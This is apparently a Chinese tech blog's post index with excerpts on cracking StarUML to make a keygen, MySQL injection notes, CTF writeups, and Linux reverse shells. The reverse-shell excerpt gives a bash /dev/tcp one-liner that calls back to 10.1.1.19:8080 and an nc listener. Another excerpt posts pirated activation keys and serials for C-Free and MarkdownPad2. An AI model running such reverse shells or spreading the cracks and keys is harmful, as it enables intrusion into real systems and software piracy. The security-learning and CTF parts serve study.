- 博客(6)
- 资源 (3)
- 收藏
- 关注
原创 StartUML破解
1.前言这个学期开了uml的课程,老师让下载了一个staruml,结果不是个免费软件,看了一价格竟然要70美元,于是就看看能不能试着破解一下。虽然过程中查到网上有许多教程,不过都是直接改文件的那种,但是本着学习的态度,我决定从头到尾开始弄,最后做个激活码生成的工具来,虽然并不是很难,但是却也学到不少东西。2.过程首先进入StarUML的安装目录,发现是nodejs写的,然后打开软件,在输入激活码的地
2018-04-22 20:26:22 1253
原创 Mysql注入学习笔记(一)
0x01–前言一直以来MySql注入的基础掌握的都不是太好,所以在注入的时候总是会出现这样那样的问题,于是我就打算系统学习一下。有什么不对的地方欢迎大家指出,也欢迎大家给予补充。0x02–information_schema数据库简介information_schema数据库就MySQL自带的,它提供了访问数据库元数据的方式。什么是元数据呢?元数据是关于数据的数据,如数据库名或表名,列的数据类型,或
2017-10-17 21:17:57 364
原创 linux下反弹shell的几种方法
在反弹的开始,我们需要使用nc在本地或者任意要反弹到的地方监听一个端口。最简单的做法是nc -l -p 8080,8080为要反弹的端口0x01—使用bashbash -i >& /dev/[tcp|udp]/10.1.1.19/8080 0>&1 注:该命令使用的是系统原生bash,[tcp|udp]是要使用的协议,一般选择tcp就行,10.1.1.19是你要反弹到的地址,如果要反弹到你的电脑上
2017-03-20 08:15:39 13090
原创 百度杯ctf2月场web-include
打开题目链接,显示如下内容:显示的代码如下:<?php show_source(__FILE__);if(isset($_REQUEST['path'])){ include($_REQUEST['path']);}else{ include('phpinfo.php');}可以知道这是个文件包含的题目,只要我们去读出包含有flag的文件就可以了,由于我们不知道包含于哪个文件
2017-03-14 20:59:56 2061
原创 实验吧唯快不破writeup
题目是这个样子的:点击解题链接显示如下:下面来分析这道题目,首先从题目和内容可以看出,要想得到key值,必须要快!所以十之八九是考编程题,因为你再快也快不过机器接着它题目的提示是看看响应头,可以知道我们想要的在响应头里,于是使用brupsuite拦截,查看响应头可以看到如下内容:其中有个选项是flag,值是一个base64的加密字符串,将其解密得出以下内容:到这里我就想了,不是应该考编程吗,这也不用
2016-12-09 15:17:41 1574
原创 自己平时收集的一些软件的激活码
这些都是自己平时要用的,找也挺麻烦的,现在贴在这里,一是备忘,二是好东西,要大家享嘛~~c-free激活码 姓名:reed 邮箱:qianqian.luwei@163.com 序列号:2MXUtdjF1LWHwMCszMX16p+fm7jGwce+zMi1Markdown pad2激活码 邮箱地址:Soar360@live.com 授权秘钥: GBPduHjWfJU
2016-12-09 15:13:49 2364
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人